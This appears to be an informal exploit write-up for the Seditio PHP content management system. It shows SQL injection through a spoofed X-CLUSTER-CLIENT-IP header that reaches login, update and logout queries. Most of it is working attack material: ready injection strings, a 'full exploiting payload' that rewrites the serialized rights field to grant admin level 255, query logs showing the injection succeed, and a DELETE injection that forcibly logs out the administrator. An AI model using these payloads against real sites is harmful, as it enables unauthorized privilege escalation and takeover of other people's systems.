- $cfg['clustermode'] = ADMIN PANEL checkbox YES and value true :)
- $usr['ip'] = ($cfg['clustermode']) ? $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'] : $_SERVER['REMOTE_ADDR'] ;
- NOT VALIDATED or SANITIZED
- SQL Injection :)
- sed_sql_query("UPDATE $db_users SET user_lastip='".$usr['ip']."' WHERE user_id='".$row['user_id']."' LIMIT 1");
- Authentication page (Header)
- X-CLUSTER-CLIENT-IP: 127.0.0.1' or 1='1
- QUERY SNIP____
- MariaDB [sed]> UPDATE sed_users SET user_lastip='127.0.0.1' or 1=1 WHERE user_id=1;
- /*BLIND SQL*/
- +-------------+-----------+
- | user_lastip | user_name |
- +-------------+-----------+
- | 1 | admin |
- +-------------+-----------+
- 1 row in set (0.00 sec)
- MariaDB [sed]> select user_lastip,user_name from sed_users;
- +-------------+-----------+
- | user_lastip | user_name |
- +-------------+-----------+
- | 1 | admin |
- +-------------+-----------+
- 1 row in set (0.00 sec)
- second vector
- MariaDB [sed]> select user_lastip,user_name from sed_users where user_id=1;
- +------------------+-----------+
- | user_lastip | user_name |
- +------------------+-----------+
- | 5.5.30-MariaDB-m | admin |
- +------------------+-----------+
- 1 row in set (0.00 sec)
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- and privilege escalation :P
- MariaDB [sed]> select * from sed_auth where auth_code='admin';
- +---------+--------------+-----------+-------------+-------------+------------------+------------------+
- | auth_id | auth_groupid | auth_code | auth_option | auth_rights | auth_rights_lock | auth_setbyuserid |
- +---------+--------------+-----------+-------------+-------------+------------------+------------------+
- | 1 | 1 | admin | a | 0 | 255 | 1 |
- | 2 | 2 | admin | a | 0 | 255 | 1 |
- | 3 | 3 | admin | a | 0 | 255 | 1 |
- | 4 | 4 | admin | a | 0 | 255 | 1 |
- | 5 | 5 | admin | a | 255 | 255 | 1 |
- | 76 | 6 | admin | a | 1 | 0 | 1 |
- +---------+--------------+-----------+-------------+-------------+------------------+------------------+
- 6 rows in set (0.01 sec) = > privileges selection
- MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin';
- +--------------+-------------+
- | auth_groupid | auth_rights |
- +--------------+-------------+
- | 1 | 0 |
- | 2 | 0 |
- | 3 | 0 |
- | 4 | 0 |
- | 5 | 255 |
- | 6 | 1 |
- +--------------+-------------+
- 6 rows in set (0.20 sec)
- = > administrator group int(5)
- administrator rights = > 255 (admin panel keys :D)
- MariaDB [sed]> select grp_id,grp_alias from sed_groups;
- +--------+----------------+
- | grp_id | grp_alias |
- +--------+----------------+
- | 1 | guests |
- | 2 | inactive |
- | 3 | banned |
- | 4 | members |
- | 5 | administrators |
- | 6 | moderators |
- +--------+----------------+
- 6 rows in set (0.02 sec)
- members request output serialize() call
- /*
- a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
- members "admin";a:1:{s:1:"a";i:0;}
- key (admin) value (a) = > int("0") - (member rights)
- MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=4;
- +--------------+-------------+
- | auth_groupid | auth_rights |
- +--------------+-------------+
- | 4 | 0 |
- +--------------+-------------+
- */
- // Lazily build the rights grid the first time a user with an empty
- // user_auth column logs in; the serialized grid is appended to the later
- // UPDATE through $sys['sql_update_auth'].
- if (empty($row['user_auth']))
- {
- $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
- $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
- }
- administrator request :)
- and output result
- /* output result
- a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:255;}s:6:"forums";a:2:{i:1;i:255;i:2;i:255;}s:7:"gallery";a:1:{s:1:"a";i:255;}s:5:"index";a:1:{s:1:"a";i:255;}s:7:"message";a:1:{s:1:"a";i:255;}s:4:"page";a:4:{s:8:"articles";i:255;s:4:"news";i:255;s:7:"sample1";i:255;s:7:"sample2";i:255;}s:3:"pfs";a:1:{s:1:"a";i:255;}s:4:"plug";a:13:{s:7:"adminqv";i:255;s:7:"cleaner";i:255;s:7:"contact";i:255;s:14:"massmovetopics";i:255;s:4:"news";i:255;s:11:"passrecover";i:255;s:11:"recentitems";i:255;s:6:"search";i:255;s:10:"skineditor";i:255;s:10:"statistics";i:255;s:8:"syscheck";i:255;s:7:"tinymce";i:255;s:10:"whosonline";i:255;}s:2:"pm";a:1:{s:1:"a";i:255;}s:5:"polls";a:1:{s:1:"a";i:255;}s:7:"ratings";a:1:{s:1:"a";i:255;}s:5:"users";a:1:{s:1:"a";i:255;}}
- +++++++++++++++++++++++++++++++++++
- admin "admin";a:1:{s:1:"a";i:255;}
- key (admin) value (a) = > int("0") - (member rights)
- MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=5;
- +--------------+-------------+
- | auth_groupid | auth_rights |
- +--------------+-------------+
- | 5 | 255 |
- +--------------+-------------+
- */
- =========================================================
- // Builds the rights grid for a user: a nested array
- // [auth_code][auth_option] => rights, bitwise-OR-ed across every group the
- // user belongs to (the main group plus the rows found in $db_groups_users).
- // $userid == 0 or $maingrp == 0 yields the grid of group 1 only
- // (guests, per the sed_groups dump above).
- function sed_auth_build($userid, $maingrp=0)
- {
- global $db_auth, $db_groups_users;
- $groups = array();
- $authgrid = array();
- $tmpgrid = array(); // assigned but never used below
- if ($userid==0 || $maingrp==0)
- {
- $groups[] = 1;
- }
- else
- {
- $groups[] = $maingrp;
- // NOTE(review): $userid is interpolated into the query without escaping;
- // it is only as safe as the caller's value -- confirm it is always an
- // integer before it reaches this point.
- $sql = sed_sql_query("SELECT gru_groupid FROM $db_groups_users WHERE gru_userid='$userid'");
- while ($row = sed_sql_fetchassoc($sql))
- { $groups[] = $row['gru_groupid']; }
- }
- // Group ids come back from the DB and are joined unquoted into the IN list.
- $sql_groups = implode(',', $groups);
- $sql = sed_sql_query("SELECT auth_code, auth_option, auth_rights FROM $db_auth WHERE auth_groupid IN (".$sql_groups.") ORDER BY auth_code ASC, auth_option ASC");
- // Bitwise OR: a right granted by any one of the groups is kept.
- while ($row = sed_sql_fetchassoc($sql))
- { $authgrid[$row['auth_code']][$row['auth_option']] |= $row['auth_rights']; }
- return($authgrid); }
- //update privileges
- $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
- Evaluation of the admin rights.
- $di=unserialize($usr['auth']);
- echo $di['admin']['a']; //output 255 :) then the verification :P
- Privilege escalation exploitation
- problem banlist section :)
- $usr['ip']="127.0.0.1'or 1=1--";
- $userip = explode('.', $usr['ip']);
- $ipmasks = "('".$userip[0].".".$userip[1].".".$userip[2].".".$userip[3]."','".$userip[0].".".$userip[1].".".$userip[2].".*','".$userip[0].".".$userip[1].".*.*','".$userip[0].".*.*.*')";
- var_dump($userip);
- IPv4#Addressing 127.0.0.1'or 1=1--
- echo $usrip[3]; //output result
- IN(127.0.0.1') or usr_auth='blah'-- -)
- nooo syntax :)
- second query (Update statement)
- 130516 21:25:52 66 Query UPDATE sed_users SET user_lastlog='1368721491', user_lastip='12.3.44.4.4') or usr_auth='blah' -- -
- true syntax? = nono :)
- 4 th key :)
- $usr['ip']="127.0.0.1.4'or 1=1-- -";
- var_dump($usr['ip']); //output 4'or 1=1-- -
- 4 th key not used
- me login: administrator
- MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G
- *************************** 1. row ***************************
- user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
- 1 row in set (0.44 sec)
- (admin) key (a) value => "0" no perm :D
- change perm via sql injection (privilege escalation)
- No Cookie option
- // Session-backed auth (authmode 2 or 3) needs the PHP session started first.
- if ($cfg['authmode']==2 || $cfg['authmode']==3)
- { session_start(); }
- // The identity triple (user id, 32-char password value, session string) is
- // taken from the PHP session as-is -- no sed_import coercion on this branch.
- if (isset($_SESSION['rsedition']) && ($cfg['authmode']==2 || $cfg['authmode']==3))
- {
- $rsedition = $_SESSION['rsedition'];
- $rseditiop = $_SESSION['rseditiop'];
- $rseditios = $_SESSION['rseditios'];
- }
- // Cookie-backed auth: a base64 blob split on ':_:'. sed_import with the
- // INT / H32 / ALP filters is the only sanitisation the cookie fields get
- // before they are interpolated into the SELECT below.
- elseif (isset($_COOKIE['SEDITIO']) && ($cfg['authmode']==1 || $cfg['authmode']==3))
- {
- $u = base64_decode($_COOKIE['SEDITIO']);
- $u = explode(':_:',$u);
- $rsedition = sed_import($u[0],'D','INT');
- $rseditiop = sed_import($u[1],'D','H32');
- $rseditios = sed_import($u[2],'D','ALP');
- }
- // NOTE(review): $rsedition and $rseditiop are interpolated straight into
- // the SELECT, and $usr['ip'] is concatenated unescaped in the ipcheck
- // branch. $usr['ip'] should be validated as an IP address (or bound as a
- // query parameter) before it reaches any query.
- if ($rsedition>0 && $cfg['authmode']>0)
- {
- if (mb_strlen($rseditiop)!=32)
- { sed_diefatal('Wrong value for the password.'); }
- if ($cfg['ipcheck'])
- { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
- else
- { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
- if ($row = sed_sql_fetcharray($sql))
- {
- // Main groups 1-3 (guests / inactive / banned in the sed_groups dump
- // above) never become a logged-in $usr.
- if ($row['user_maingrp']>3)
- {
- $usr['id'] = $row['user_id'];
- $usr['sessionid'] = ($cfg['authmode']==1) ? md5($row['user_lastvisit']) : session_id();
- $usr['name'] = $row['user_name'];
- $usr['maingrp'] = $row['user_maingrp'];
- $usr['lastvisit'] = $row['user_lastvisit'];
- $usr['lastlog'] = $row['user_lastlog'];
- $usr['timezone'] = $row['user_timezone'];
- $usr['skin'] = ($cfg['forcedefaultskin']) ? $cfg['defaultskin'] : $row['user_skin'];
- $usr['lang'] = ($cfg['forcedefaultlang']) ? $cfg['defaultlang'] : $row['user_lang'];
- $usr['newpm'] = $row['user_newpm'];
- // NOTE(review): unserialize() of a DB column; whatever is stored in
- // user_auth is trusted as the user's rights grid without further checks.
- $usr['auth'] = unserialize($row['user_auth']);
- $usr['level'] = $sed_groups[$usr['maingrp']]['level'];
- $usr['profile'] = $row;
- // Coming back after cfg timedout counts as a new visit; the new
- // lastvisit is pushed into the later UPDATE via $sys['sql_update_lastvisit'].
- if ($usr['lastlog']+$cfg['timedout'] < $sys['now_offset'])
- {
- $sys['comingback']= TRUE;
- $usr['lastvisit'] = $usr['lastlog'];
- $sys['sql_update_lastvisit'] = ", user_lastvisit='".$usr['lastvisit']."'";
- }
- // First login with an empty user_auth builds and serializes the rights grid.
- if (empty($row['user_auth']))
- {
- $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
- $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
- }
- // $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
- }
- }
- }
- Cookie header send
- Cookie: PHPSESSID=blablablasessionidrseditionandauthmode
- if true :/ (if ($rsedition>0 && $cfg['authmode']>0));
- if ($rsedition>0 && $cfg['authmode']>0)
- {
- if (mb_strlen($rseditiop)!=32)
- { sed_diefatal('Wrong value for the password.'); }
- if ($cfg['ipcheck'])
- { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
- else
- { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
- file: config.php
- section: $cfg['ipcheck']=true;
- fail syntax
- $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'");
- my vector and fail syntax
- 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
- full snip query
- +++++++++++++++++++++++++++++++++++++
- SELECT * FROM $db_users WHERE user_id='3 AND user_password='blah' AND user_lastip='127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -'
- Failure syntax :(
- LOGIN PAGE REQUEST (HTTP HEADER)
- X-CLUSTER-CLIENT-IP: 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
- http://s18.postimg.org/xcjy55mkp/fullquery.png
- return false if the cookie option is empty
- /*
- if ($rsedition>0 && $cfg['authmode']>0) // output result false :) (no cookie option)
- */
- after the introduction mysql query log :)
- 326 Query SELECT user_id, user_maingrp, user_banexpire, user_skin, user_lang FROM sed_users WHERE user_password='3e1f0522ece29f7be6f69cd3bfb2d9a8' AND user_name='admin'
- 326 Query UPDATE sed_users SET user_lastip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' WHERE user_id='1' LIMIT 1
- 326 Query DELETE FROM sed_online WHERE online_userid='-1' AND online_ip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' LIMIT 1
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- AFTER
- Full exploiting payload
- 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
- MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G*************************** 1. row ***************************
- user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
- 1 row in set (0.00 sec)
- "admin";a:1:{s:1:"a";i:255;}
- value = > "255" WTF ? :D ??
- ADMIN PANEL :D
- http://s22.postimg.org/whujo6xu9/lol.png
- ==============================================================
- Unauthorized user *logout*
- MariaDB [sed]> select online_ip,online_name from sed_online;
- +-----------+-------------+
- | online_ip | online_name |
- +-----------+-------------+
- | 127.0.0.1 | admin |
- | 128.0.0.2 | user |
- +-----------+-------------+
- 2 row in set (0.00 sec)
- me login => user :)
- Logout page request (HEADER) = > logout.php
- X-CLUSTER-CLIENT-IP: 127.0.0.1
- // Logout: drop the caller's sed_online row and redirect.
- if ($usr['id']>0)
- {
- // NOTE(review): $usr['ip'] is concatenated into both the DELETE and the
- // redirect URL without escaping or validation; it should be checked as an
- // IP address (or bound as a query parameter) before reaching either.
- $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='".$usr['ip']."'");
- sed_redirect("message.php?msg=".$usr['ip']);
- exit;
- }
- echo $usr['ip'] => Output 127.0.0.1222233' or online_name='admin' (Spoof X IP)-(Administrator IP :D) :)
- QUERY EXEC - > $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='127.0.0.1222233' or online_name='admin'");
- ???? profit = administrator panic :D
- my favorite :) http://www.youtube.com/watch?v=ruFt9ZvBnvo